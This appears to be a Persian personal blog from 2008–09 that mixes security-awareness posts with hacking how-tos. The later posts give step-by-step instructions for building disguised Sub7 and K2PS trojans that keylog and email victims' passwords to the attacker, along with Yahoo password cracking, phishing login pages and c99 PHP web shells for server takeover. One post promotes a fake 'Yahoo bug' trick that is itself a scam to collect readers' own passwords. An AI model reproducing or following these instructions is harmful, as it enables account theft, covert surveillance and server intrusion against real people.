در مجموع، دور نگه‌داشتن سيستم از شر جاسوس‌افزارها، تبليغ‌افزارها و به‌طوركلي برنامه‌هاي مخرب، احتياج به دقت و هشياري دارد. بيشتر كاربراني كه از پاپ‌آپ‌ها و جاسوس‌افزارها شكايت دارند، به خاطر اين است كه آگاه نيستند اين چيزها چگونه به كامپيوترشان راه پيدا مي‌كنند. به پيام‌هايي كه پيشنهاد نصب يك نرم‌افزار را به شما مي‌دهند، خوب دقت كنيد و چشم بسته قبول نكنيد. اگر برنامه‌اي را از قبل نمي‌شناسيد، بدون خواندن <توافق‌نامه كاربر> اقدام به نصب آن نكنيد. اگر چيز مشكوكي را ديديد، روي هيچ دكمه‌اي كليك نكنيد (نه Yes و نه No)، و بلافاصله پنجره را ببنديد (كليد Alt+F4 را بزنيد).

سرقت مرورگر
سرقت صفحه يا هايجك‌كردن مرورگر (browser hijack يا مرورگرربايي) يكي از رايج‌ترين آزارهاي اينترنتي (بيشتر از ويروس و كرم) است كه كاربران خانگي و حتي شركتي را گرفتار كرده است. هدف از اين كار، اولاًً هدايت كردن وب‌گردها به يك سايت جستجوگر خاص و ثانياً نظارت بر فعاليت آن‌ها به منظور هدفمند‌كردن تبليغات (در قالب پنجره‌هاي پاپ‌آپ) مي‌باشد. هايجك كردن مرورگر چيزي بين malware و adware است.

انگيزه اين كار بر خلاف ويروس‌ها، پول درآوردن است؛ پولي كه از فروش فضاي تبليغاتي در وب و فروش خدمات و كالاهاي تبليغ‌كنندگان به دست مي‌آيد. البته برخي از سارقان مرورگرها، با backdoor و تروجان‌هايي همراهند كه به فروشندگان امكان دانلود برنامه‌هاي مخرب و جمع‌آوري كليدضربه‌ها و ساير اطلاعات خصوصي را مي‌دهند.

متأسفانه هيچ راه يكساني براي از بين‌بردن تمام اين نرم‌افزارها وجود‌ندارد. تكنيك‌هاي هايجك‌كردن مرورگر، امروزه بسيار پيچيده شده‌اند. از صفحات ساده‌اي كه با استفاده از كدهاي جاوا اسكريپت صفحه پيش‌فرض را تغيير مي‌دهند گرفته تا موجوداتي مثل Smartsearch.WS كه با تغيير رجيستري كاري مي‌كنند كه اگر كاربر فراموش كرد پيشوند HTTP را تايپ كند، خود به خود هر صفحه را به سايت خودش تغيير جهت دهد.

بهترين راه براي مقابله با هايجك‌كننده‌هاي مرورگر، پيشگيري از آن‌هاست. بيشتر هايجك‌ها با تعامل خود كاربر صورت مي‌گيرند. وقتي كاربر به ديدن صفحات خاصي از وب مي‌رود، با پاپ‌آپي مواجه مي‌شود كه پيشنهاد دانلود يك نرم‌افزار، يك چيز رايگان، يا در ساده‌ترين شكل، تغيير صفحه شروع مرورگرش را مي‌دهد. در اين مواقع فقط يك كار صحيح است؛ رد پيشنهاد.

اخيراً برخي از هايجكرها به روش‌هاي ويروس‌گونه روي آورده‌اند و از نقاط ضعف اينترنت اكسپلورر سوءاستفاده‌ مي‌كنند. نقطه ضعف MHTRedir يك سري تروجان را پوشش مي‌دهد كه غالباً براي دانلود تماس‌گيرنده‌هاي مستهجن و اخيراً كرم Bagle.AQ به‌كار گرفته مي‌شوند. البته مايكروسافت اين نقطه ضعف را با روزآمدسازي امنيتي MS04-025 خود ترميم كرده است. بنابراين اگر سيستم‌شما بروز باشد، كمتر مورد آسيب قرار‌مي‌گيرد. محصولات ضدويروس هم، بسياري از اين نوع تروجان‌ها را شناسايي مي‌كنند. بنابراين به كمك اين برنامه‌ها هم مي‌توانيد جلوي هايجك‌شدن را از همان ابتدا بگيريد.

اما اگر بعد از همه اين مراقبت‌ها باز هم گرفتار هايجك شديد، برنامه‌هايي مثل
Hijack This ،Ad-aware ،Spybot S&D و SpySweeper احتمالاً مشكل شما را حل‌مي‌كنند. همچنين سايت‌هايي چون Scumware.com ،MVP.org ،Spywareinfo.com و MajorGeeks.com مي‌توانند مفيد باشند

+ نوشته شده توسط سید در شنبه نوزدهم بهمن 1387 و ساعت 14:21 |

چگونه فايل هاي هك را شناسايي كنيم؟ سوالی که بسیاری از کاربران روزانه از خودشان میپرسند. در دنیای ناامن اینترنت ، این سوال یکی از مهم ترین ارکان امنیتی سیستمهای کامپیوتری میباشد. به عنوان مثال در هنگام چت کردن چگونه پی ببریم فایلی که برای ما ارسال شده یک فایل هک است یا خیر؟ در این ترفند قصد داریم روش های شناسایی این فایلهای خطرناک را به شما معرفی کنیم.

وقتي شخصي فايلي را براي شما از طریق یاهو مسنجر ارسال مي كند در پيغامي كه براي شما مبني بر تاييد آن مي آيد نام شخص فرستنده نام فايل حجم آن و همچنين فرمت و از اين قبيل اطلاعات در آن قيد شده است . شما بايد توجه داشته باشيد كه آيا فايلي كه براي شما ارسال شده از لحاظ نوع و فرمت همان فايلي است كه قرار بوده ارسال شود يا خير ؟
در حقيقت مثلا اگر عكسي مي خواهيد دريافت كنيد ايد فايل مربوطه پسوند JPG و يا يكي از پسوندهاي فايلهاي گرافيكي را داشته باشد.
نه اينكه فايلي با پسوند اجرايي Exe و يا Bat براي شما ارسال شود و فرستنده هم مدعي باشد كه اين يك فايل تصويري است.
در واقع فايلهاي هك كه با نرم افزارهای تروجان ساز ساخته مي شوند ، در قسمت پسوند داراي پسوندهايي مثل SCR يا ExE و ... و يا مثل mypic. jpg.scr مي باشند كه نشان دهنده آن است كه فايل فرستاده شده يكي از انواع فايل هاي ساخته شده توسط نرم افزارهای مخرب است كه براي بدست اوردن پسورد شما مي باشد.
بنابراين همواره نوع پسوند فايلهاي دريافتي را زير نظر داشته باشيد و بدانيد كه از اين طريق و قبل از هر چيز (حتي قبل از استفاده از نرم افزارهاي ضد هك و ضد ويروس) مي توانيد تا حد زيادي از كيفيت نوع و چگونگي عملكرد و ماهيت يك فايل اطلاع حاصل كنيد.
فرضأ مطمئن باشيد كه يك فايل ويروسي نباشد ميتواند پس از اجرا بلا هاي ناخواسته برسر سيستم شما بياورد.

+ نوشته شده توسط سید در شنبه نوزدهم بهمن 1387 و ساعت 14:20 |

در این ترفند قصد داریم به معرفی متداول ترین اشتباهات کاربران در تمامی سطوح دانسته ها بپردازیم. بیشتر این اشتباهات به مسائل امنیتی مربوط میشود. نصب بی رويه نرم افزار خصوصأ نرم افزارهائی كه از طريق اينترنت دريافت می گردد ، كليك بر روی دكمه OK در يك جعبه محاوره ای كه ممكن است باعث تغيير تنظيمات يك برنامه و در نهايت رفتار يك كامپيوتر و حتی در برخی موارد از كارافتادن سيستم گردد ،‌ نمونه هائی اندك در اين زمينه می باشند. پیشنهاد میکنیم این ترفند را حتما با دقت مطالعه بفرمایید چرا که ممکن است شما نیز این اشتباهات را مرتکب شوید و خودتان بی خبر باشید!

يك مشكل بسيار گسترده در اينترنت وجود دارد و آن پيغامهاي الكترونيكي كه در مورد يك ويروس هشدار مي دهند و اين هشدار در مورد يك email با يك عنوان ( subject ) مشخص مي باشد كه اين email ها ويروس هاي خطرناك هستند و به كامپيوتر شما آسيب مي رسانند.

مثال:

Please do not open %0

+ نوشته شده توسط سید در شنبه نوزدهم بهمن 1387 و ساعت 14:19 |

خوب راستش اين كار به همين راحتي كه مردم فكر ميكنن نيست ولي راههاي مختلفي وجود داره.

1ـCrack:
يكي از راه ها Crack كردن پسورد طرف براي اين كار نياز به يه برنامه Cracker مثل Yahoo!Cracker دارين كه ميتونين اونو از سايت:
http://www.yahpro.com/
download كنين
روش اين برنامه به اين صورت كه با امتحان كردن پسوردهاي زياد در مدت كم پسورد طرف رو براي شما پيدا كنه به صورتي كه شما يه ليست با فرمت txt در اختيارش بذارين كه پر از اعداد و كلمه ها باشه و يا اين كه بصورت Random خودش انتخاب كنه
*******************************
2ـTrojan:
اين روش بهتريه و درصد براي به دست آوردن پسورد خيلي بالاست و شما براي به دست آوردن هر نوع پسوردي ميتونين از اون استفاده كنين(چه پسورد اينترنت و چه پسورد ياهو و Msn و ...)
۱-وارد سايت http://www.sub7.net/ بشين
۲-Enter كنين
۳ـوارد قسمت Downloads بشين
۴ـروي Old Version Downloads كليك كنيد
۵ـSub7 2.2 رو download كنين
۶ـپس از download و Setup كردن به فولدري كه برنامرو Setup كردين برين و فايل:EditServer.exe رو اجرا كنين
۷ـپس از اجرا كردن يه پنجره باز ميشه و شما Run In Normal Mode(اجرا در محيط نرمال) رو انتخاب كنين
۸-به Port كاري نداشته باشين و در صورت مايل بودن براي سرور خود پسورد انتخاب كنين
۹-در منوي سمت چپ به startup methods كاري نداشته باشين و بر روي Notification كليك كنيد
۱۰-روي add e-mail notify كليك كنيد و آدرس اي ميل خودتون رو وارد كنين(@ يادتون نره)
۱۱-حالا دوباره از منوي سمت چپ PlugIns رو انتخاب كنين
۱۲ـرو add binded Plugin كليك كنين
۱۳ـاز فولدر PlugIns پلاگ اين s7keys.dll رو انتخاب كنين
۱۴-روي exe icon/other كليك كنين
۱۵-در اين قسمت ميتونين براي سرور خودتون آيكون و Error گمراه كننده درست كنين
۱۶-روي ...Save as كليك كنين و سرور خودتون رو Save كنين

نكته :
۱-توجه داشته باشين كه براي Save كردن بايستي exe. رو بنويسين
۲-هرگز فايل server.exe رو اجرا نكنين همينطور سرورهايي كه خودتون ساخته ايد
۳-بهتر است براي آن كه كسي به exe بودن سرور شما شك نكنه از پسوند scr. به جاي exe. استفاده كنين(موقع Save كردن)
۴ـبهتر است هميشه E-mail ياهوي خودتونو بدين و Msn و Hotmail اكثرا كار نميكنند.

Hack:
۱-پس از ساختن سرور كافيست اونو براي كسي كه مايل به Hack كردنش هستين بفرستين پس از اين كه طرف فايل رو اجرا كرد به آدرس E-Mail كه دادين يه ميل مياد كه Subject:Online و پس از باز كردن در اون يه شماره IP وجود داره اونو كپي كرده و سپس برنامه Sub7.exe رو اجرا كرده و در قسمت IP وارد كنين(Port هم همچنين) و بر روي Connect كليك كنين
۲-پس از وصل شدن به كامپيوتر طرف از منوي سمت چپKeys/messeges رو انتخاب كنين
۳-سپس KeyBoard رو انتخاب كنين
۴-بعد Open KeyLogger رو باز كنين و بر روي آيكون ¤دست¤ كليك كنين

حالا تمام كليدهاي كه طرف شما وارد ميكنه قابل ديدن هستن كافيه يه بار اونو از باهو بندازين بيرون و منتظر بمانين كه دوباره LogIn كنه و پسوردشو وارد كنه
در صورتي كه اين كار جواب نداد ميتونين از قسمت Yahoo!Spy استفاده كنين

نكته:
براي بدست آوردن اينترنت بر روي Advanced/Passwords/Ras Passwords كليك كنين و پس از Upload شدن پلاگ اين مربوطه ميتونين پسوردهاي طرفو در ببارين
در صورتي كه Windows طرف XP باشه متاسفم چون امكان در آوردن پسورد وجود نداره
********************************
3 – از طریق رفتن پروفایل ! خوب قبل از این که یاهو سیستم امنیتیش رو عوض کنه پروفایل و ایمیل روی یه سرور کدبندی شده بودند و شما می تونستید با نگاه کردن به کد بندی و آدرس پروفایل و یکمی زیرکی بدون دونستن پسورد ایمیل وارد یاکس ایمیلش بشید که این روش بعد از تغیر سیستم امنیتی یاهو خیلی خیلی سخت شده و شاید هم ناممکن !
********************************
4- شبیه سازی صفحه ورود به ایمیل است که درواقع پشت اون یه پسورد سندر همه کارارو انجام می ده ! و به این شکل هست که ابتدا یه صفحه لاگین ایمیل مانند یاهو می سازید و در سایت خودتون قرار میدی و فرد با وارد شدن به این قسمت و دادن پسورد خود در واقع اونو به ایمیل شما می فرسته !

+ نوشته شده توسط سید در شنبه نوزدهم بهمن 1387 و ساعت 14:10 |

چند روزی که در این خانه ی تن مهمانی

با ادب باش که خاصیت مهمان ادب است

+ نوشته شده توسط سید در سه شنبه پانزدهم بهمن 1387 و ساعت 9:57 |

کالای اسرائیلی را تحریم کنیم

+ نوشته شده توسط سید در یکشنبه ششم بهمن 1387 و ساعت 13:54 |

قصد داریم تا اینبار یک ترفند فوق العاده را برای شما معرفی کنیم. مطمئنأ برای شما نیز پیش آمده که دوست داشته باشید گاهی ناشناس بمانید. این ترفند روشی را به شما معرفی میکند که میتوانید پیام کوتاه متنی SMS ارسال کنید به شکلی که شماره شما برای فرد مورد نظر نمایش پیدا نکند و کاملأ مخفی میمانید. این ترفند خصوصیاتی دارد که باید گوشی فرستنده و دریافت کننده آن را دارا باشد. پیشنهاد میکنیم این ترفند را حدأقل یکبار تست کنید تا نتیجه را ببینید.

ابتدا به این نکات دقت کنید:
این ترفند تنها روی گوشی هایی قابل اجراست که قابلیتی به نام Email gateway را دارا باشند. گوشی هایی که این قابلیت رو دارند اکثرأ سونی اریکسون هستند همانند W800 , W810 , W550 ,K750 , K700 , S700 و ... .
برای استفاده از این ترفند باید هر دو گوشی فرستنده و دریافت کننده قابلیت Email gateway را دارا باشند. پس پیش از هرکاری این موضوع رو یقین پیدا کنید.

اکنون همانند دستورالعمل زیر مراحل را طی کنید ، تنها ممکن است بسته به تنوع گوشی شما مقداری تغییرات وجود داشته باشد:
ابتدا از منوی اصلی وارد قسمت Messaging شوید. سپس به قسمت Settings رفته و به بخش Text Messaging وارد شوید. در قسمت بعد به Email gateway رفته و شماره فردی که میخواهید SMS را برایش ارسال کنید را وارد کرده و Add کنیم.
حالا به عقب بازگردید ، پس از وارد شده مجدد به بخش Messaging ، قسمت Write New را انتخاب کنید. Text Message را انتخاب کنید ، متن مورد نظر را تایپ نمایید و Continue را انتخاب کنید. اکنون گزینه اول یعنی Enter Email Address را انتخاب کرده و ایمیل info@tarfandestan.com را وارد نمایید. در پایان پیام را ارسال کنید.

اکنون فرد مورد نظر به هنگام دریافت پیام به جای شماره شما آدرس ایمیلی که وارد کردید را مشاهده خواهد کرد.

+ نوشته شده توسط سید در جمعه چهارم بهمن 1387 و ساعت 14:33 |

این تروجان تمام پسورد ها و شماره تلفن های وارد شده در سيستم قربانی را براي شما ميل مي کند ! طرز کار آن هم خيلی ساده است . اول برنامه را از لينك http://www.sharemation.com/tnt7/booters/K2PS034.zip دانلود کنيد و از حالت زيپ خارجش کنيد فايل K2pS_setup را اجرا کنيد .دکمه open را بزنيد . حال يکی از فايلهای کناری این برنامه را انتخاب کنيد و open را بزنيد ... فايل اولی که K2pS است تمام يوزر پسورد ها و شماره ها را برای شما هر زمان که قربانی به اینترنت وصل شود برای شما فرستاده مي شود و دومی که K2pS_full است همان کار را مي کند با این تفاوت که ديگر پسورد های تکراری را برای شما نمي فرستد ! حالا بعد از انتخاب سرور .. در قسمت smtp srver : بايد آدرس سرور ميل را وارد کنيد (که چندتا ميل سرور را براي شما اخر مي نويسم) و در قسمت destination adress ايميلی که بايد اطلا عات به آن فرستاده شود (ايميل خود شما) در قسمت source address هم اسم قربانی يا هر چی که دوست داريد وارد کنيد و بعد دکمه save را بزنيد .. سرور شما آماده است توجه کنيد که فايلی را ایجاد نمي کند در واقع فايل سروری که انتخاب کرديد را ويرايش مي کند .. پس فايل سرور همان فايلی است که open کرديد ... . ادرس سرورها : noavar.com

mail.noavar.com

yahoo.com

mx1.mail.yahoo.com

mx2.mail.yahoo.com

mx4.mail.yahoo.com

+ نوشته شده توسط سید در چهارشنبه بیست و هفتم آذر 1387 و ساعت 18:42 |

مقدمه:

سلام در اینجا روشی به شما یاد خواهم داد که بدون تعلیمات و دانش قبلی می توانید به راحتی پسورد یک نفر را بدست آورید.تا حالا شده بخواهید از کسی انتقام جویی بکنید یا بفهمی کسی از نزدیکانت در یاهو چکار می کنه؟ اگر جواب شما بله است پس به سایت درستی آمدید!!

فقط سریع باشید در بخش های بعدی توضیح می دهم چرا....

چی شده؟:

در روزهای اخیر یکی از دوستام در اصفهان یک اشکالی (BUG) درسیستم
پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) کشف کرد که هنوز توسط یاهو پیدا نشده بنابرین شما باید هر چه سریع تر از این اشکال سو استفاده کنید.

ما برای سو استفاده از چه روشی استفاده خواهیم کرد؟

ما برای گرفتن پسورد از روش سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) استفاده می کنیم و خود را یک مستر(MASTER) معرفی می کنیم و به سیستم فرمان می دهیم که پسورد ما را غیب کند(Hidden) و دوباره برای ما نشان دهد (Show) و بفرستد و در بین این کار از اشکال (BUG) باید سو استفاده کنیم. ما پسورد و ID خود را به آن میدهیم و ایمیل را به شخصی که می خواهیم پسورد را بدست آوریم تغییر می دهیم در نتیجه سیستم به اشتباه پسورد قربانی را به ما می فرستد. به همین سادگی!!!!

مزیت این روش: بدون تعلیمات و دانش قبلی می توانید به راحتی پسورد یک نفر را بدست آورید و نیازی به برنامه ندارد!

روش(بخش اصلی):

1.برید تو ایمیل خود و تو قسمت Compose.
2.در قسمت TO باید ایمیل سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) را بنویسید که هست>>>>y.forgetpass@yahoo.com<<<<<<
3.در Subject ایمیل کامل خود را بنویسید(ID@yahoo.com).
4.کدی که کمی پایین تر پیدا میکنید کپی COPY کنید و داخل پیغام خود PASTE کنید.(اول کپی کنید بعد تغییر دهید)
5.حالا باید در کد کمی تغییر ایجاد کنیم.
6.بعد از قرار دادن کد داخل پیغام و در عوض کردن قسمت هایی که از شما (YahooID قربانی,پسورد شما,YahooID شما) خواسته شده کار شما تمام می شود.
7.حالا دکمه ی SEND را بنویسید.

این کد

(/cgi-bin/start?v703&login.{YahooID قربانی}=passmachine&class=supervisor&f={پسورد شما}&f=27586&{YahooID شما}=ACTIVE&rsa)

+ نوشته شده توسط سید در چهارشنبه بیست و هفتم آذر 1387 و ساعت 18:42 |

نام آموزش:PHP Shell چیست ؟

زمانی که شما میخواهید یک سایت را هک کنید معمولا از 3 راه وارد می شوید .
1. با روش های مهندس اجتماعی یا Pharming که با تروجان و ... انجام می شود .
2.در سایت یا سرور مورد نظر باگ پیدا می کنید .
3. از سرور مورد نظر شل میگیرید .

منظور از شل همان دسترسی از سرور است . حال چگونه باید از سایت مورد نظر دسترسی بگیریم ؟؟ چرا دسترسی میگیریم ؟؟ چه نوع دسترسی در اختیار داریم ؟؟

شما زمانی از سرور مورد نظر شل میگیرید که تمام راهای شما بسته باشد . یعنی سایت مورد نظر باگ نداشته باشد و رورش های مهندس اجتماعی که برفریب دادن انسان ها استوار است بر آن اثر نکند . در این مواقع شما باید از برنامه هایی که از سرور به شما شل می دهند کمک بگیرید .

برای اینکه بتوانید از سرور دسترسی بگیرید باید این برنامه های shell script را بر روی یکی از سایت های سرور مورد نظر آپلود کنید .
زیرا یکی از راهای هک کردن تمام شبکه ها عضو بودن در آن شبکه است . زیرا خیلی اطلاعات از شبکه را بدست می آورید و شما قادر خواهید بود بسیاری از کنترل های آن شبکه را در اختیار داشته باشید . چون یک عضو معتبر آن شبکه هستید . همین موضوع در هک کردن سرور ها هم سرایت خواهد کرد. و با داشتن یک سایت در آن سرور و آپلود کردن shell script ها بر روی آن می توانید از سرور دسترس بگیرید.( اما نه از کل سرور . ابتدا فقط از سایتی که بر روش shell scriptرو آپلود کریدن دسترسی دارین که باید دسترسی خودتونو بالا ببرید و به مقام root برسید) . (root در لینوکس همانند دسترسی administrator در ویندوز است.)
حال شما میتوانید یک سایت بر روی سرور هک کنید و یک shell scriptبر روی آن سایت آپلود کنید . یا یک سایت از آن سرور خریداری کنید . یا از یکی از دوستانتن که بر روی آن سرور هاست دارد از آن به مدت چند ساعت قرض بگیرید. تا بتوانید بر روی سرور عملیاتی برای root شدن انجام دهید .
اینکه شما بدان چگونه shell scriptباید آپلود کنید مهم است . زیرا shell scriptها به زبان های مختلفی نوشته می شوند . و بستگی دارد که سرور مورد نظر کدام را ساپورت کند . اگر سرور هدف لینوکس باشد بهتر است شما از php sheller ها که با زبان php نوشته شده اند استفاده کنید .

یکی از بهترین اینگونه php sheller ها c99 نام دادرد .
وقتی شما یک php sheller را بر روی یک سایت آپلود می کنید و آنرا اجرا می کنید , چند چیز برای شما باید مهم و الویت اول را داشته باشد

1. دسترسی مجاز به پوشه ها که در لینوکس به آن ((perm می گویند. بالا ترین دسترسی پوشه ها که perm دارد و به آن 777 هم می گویند دارای امکانات زیر می باشد :
Read - Write - Execute
یعنی شما میتوانید در پوشه بخوانید . بنویسید . تغیر بدهید و حتی یک فایل آپلود کنید . که در php shell ها دسترسی perm به صورت زیر جلوی هر پوشه یا فایل نوشته می شود .
drwxrwxrwx <==== اگر جلوی یک پوشه ای این علامت را در php shell ها دید بدانید می توانید در آن هر کاری انجام دهید . نظیر :

کپی . تغیر دادن . خواندن . نوشتن .
اگر عبارت به صورت -rwxrwxrwx <=== بود بدانید آن فایل است .
نکته : شما فقط تا زمانی که دسترسی کامل ندارید با اینگونه مقررات مشکل دارید اگر دسترسی کامل داشته باشید حتی در پوشه های بدونه perm که به اینگونه نوشته می شوند :dr-xr-xr-x یا r--r--r-- و نوع های دیگر .
در c99 پوشه و فایل هایی که قابل دستکاری می باشند و یا به اصطلاحی perm هستند به رنگ سبز و بدون perm به رنگ قرمز یا سفید.

2.on یا off بودن قسمت safe-mod .زیرا اگه on باشه به عبارتی شما نمیتونید root بشید . زیرا برای روت شدن باید با comand کار کنید که اگر safe-mod on باشه نمی شه comand اجرا کرد .

خوب حالا از بالا تمام آیتم های php shller را یک بار مرور می کنیم :
در این قسمت نوع سرویس دهنده سرور و ورژن اون رو نشون می ده Softwar:
دراین قسمت اطلاعاتی در بارهی سرور میده uname -a:
اگه این قسمت off باشه شما میتونید به دایرکتوری ها برید و کامند اجرا کنید اما اگه on باشه نمی تونید safe-mod:
در این قسمت به شما نشون میده که در کدام قسمت از سایت هستید و چه نوع دسترسی داریدc:\drwxrwxrwx :

این قسمت مقدار کل فضای هارد سرور و فضای استفاده شده و باقی مانده رو نشون میده: free 5.3GB of 14.96 GB (20.6%(
این قسمت به شما درایو های سرور رو نشون می دهDEtected Dirves

+ نوشته شده توسط سید در چهارشنبه بیست و هفتم آذر 1387 و ساعت 18:41 |